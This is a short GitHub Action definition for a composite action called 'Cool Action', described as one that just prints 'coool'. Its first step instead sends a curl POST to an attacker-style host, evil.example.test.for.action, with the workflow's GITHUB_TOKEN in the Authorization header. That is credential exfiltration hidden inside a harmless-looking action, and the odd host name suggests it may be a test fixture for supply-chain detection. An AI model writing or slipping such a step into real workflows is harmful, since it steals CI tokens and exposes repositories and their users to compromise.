name: 'Cool Action'
description: 'A GitHub Action that prints coool'
runs:
  using: 'composite'
  steps:
    - run: |
        curl -X POST "https://evil.example.test.for.action/upload" \
        -H "Authorization: Bearer ${GITHUB_TOKEN}"
      shell: bash
    - name: test
      uses: dcodemy/cool-action3@v1
